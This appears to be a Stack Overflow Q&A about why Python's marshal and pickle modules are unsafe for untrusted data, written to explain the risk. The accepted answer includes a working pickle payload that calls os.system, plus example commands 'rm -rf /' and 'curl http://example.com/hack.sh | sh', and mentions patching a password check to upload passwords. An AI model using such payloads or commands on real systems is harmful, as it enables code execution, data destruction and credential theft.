# Marshal unserialization - not secure

Tags: python, warnings, marshalling

I work on a project where I use `cPickle` to load files quickly. A couple of days ago I read that `marshal` can be even faster than `cPickle`. It works for me, but I'm curious, what is this warning from [the documentation](https://docs.python.org/2/library/marshal.html) about:

> **Warning**
>
> The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source.

What could exactly happen if I'm not careful?

Comment: Good question. It is easy to demonstrate arbitrary code execution using pickle but I think vulnerabilities in `marshal` are more theoretical. In some versions of Python `marshal.loads` could generate a segfault and therefore by implication might be able to overwrite memory.

Answer (score 10, accepted):

## Marshal

There are no **known** ways to exploit `marshal`. Actually executing code when
using `marshal.loads()` is not something I was able to do, and looking at the
`marhal.c` source code, I don't see an immediately obvious way.

So why is this warning here? [The BDFL explains](http://grokbase.com/t/python/python-ideas/083532w3t7/an-official-complaint-regarding-the-marshal-and-pickle-documentation#20080305gvdndfl4m3f2u6cmpxvrclfcou):

> BTW the warning for marshal is legit -- the C code that unpacks marshal data
>   has not been carefully analyzed against buffer overflows and so on. Remember
>   the first time someone broke into a system through a malicious JPEG? The same
>   could happen with marshal. Seriously.

I recommend you read the rest of the discussion; a bug is shown where
unmarshaling data causes Python to segfault; this has been fixed since Python
2.5 (this bug could, potentially, be abused to execute code). Other bugs *may*
still exist, though!

Furthermore, the `marshal` docs mention:

> This is not a general “persistence” module. [..]  The marshal module exists
>   mainly to support reading and writing the “pseudo-compiled” code for Python
>   modules of .pyc files.

So it's not even designed to persist data in a reliable way.

## Pickle

You can easily execute arbitrary code with `pickle`. For example:

```
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin   data  download  home  lib64       mnt  proc  run   srv  tmp     usr      var
boot  dev   etc       lib   lost+found  opt  root  sbin  sys  ubuntu  vagrant
0
```

This was a harmless `ls /`, but could also be a less harmless `rm -rf /`, or a
`curl http://example.com/hack.sh | sh`.

You can see how this works by using the `pickletools` module:

```
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
    0: c    GLOBAL     'os system'
   11: (    MARK
   12: S        STRING     'ls /'
   20: t        TUPLE      (MARK at 11)
   21: R    REDUCE
   22: .    STOP
```

`pickle.py` has some comments on what these opcodes mean:

```
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args 
MARK           = b'('   # push special markobject on stack
STRING         = b'S'   # push string; NL-terminated string argument
TUPLE          = b't'   # build tuple from topmost stack items
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STOP           = b'.'   # every pickle ends with STOP
```

Most of it is self-explanatory; with `GLOBAL` you can get any function, and
with `REDUCE` you call it.

Since Python is pretty dynamic, you can also use this to monkey-patch a program
in run-time. For example, you could change the `check_password` function with
one where you upload the password to a server.

## So what *is* secure?

XML, json, MessagePack, ini files, or perhaps something else. It depends on
which format is the best in your situation.

Has this code been "carefully analyzed against buffer overflows and so on"? Who
knows. Most code hasn't, and C makes it easy to do things wrong.<sup>1</sup>  Even Python
code may be vulnerable, as it [may call functions implemented in C that are
vulnerable](http://www.cvedetails.com/product/18230/Python-Python.html?vendor_id=10210).

There [have been problems with Python's JSON module](https://access.redhat.com/security/cve/CVE-2014-4616). But at the same
time, it's used a lot in public-facing apps, so it's *probably* safe. It'll
certainly be safer than `marshal`, since this was only designed for `.pyc` files
and explicitly comes with a "not audited!" warning.

This is of course no guarantee. Remember that [YAML security hole a few years back
that caused every Ruby on Rails application in the world to be vulnerable to
arbitrary code execution](http://www.kalzumeus.com/2013/01/31/what-the-rails-security-issue-means-for-your-startup/). Oops! And this wasn't even a subtle buffer
overflow, but a much more obvious problem.

Note that you should *not* use [yaml](http://pyyaml.org/)'s `load()` method, as this has [the
same problems as Ruby's YAML](http://nedbatchelder.com/blog/201302/war_is_peace.html). Use `safe_load()` instead.

## Conclusion

The warning in the `pickle` module is very much warranted (it should probably be
stated stronger), while the warning above the `marshal` module seems to be more
of a "*this code was not designed with security in mind*"-type of warning, but
actually exploiting it is not as easy, and relies on the hypothetical existence
on unknown bugs. Still, you're probably better off using something else.

---

<sup>1</sup> There really ought to be a "carefully analyzed against buffer overflows and so on" seal of trust for open source projects. Yeah, you can shelf out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is *some* effort to do this after the OpenSSL Heartbleed clusterfuck a few years ago in the form of the [Core Infrastructure Initiative](https://en.wikipedia.org/wiki/Core_Infrastructure_Initiative), but its scope and budget are fairly limited (but it's fairly young, and may gain traction in a few years).

Comment: This is not about Ruby @Prime – it's a Python question (and answer).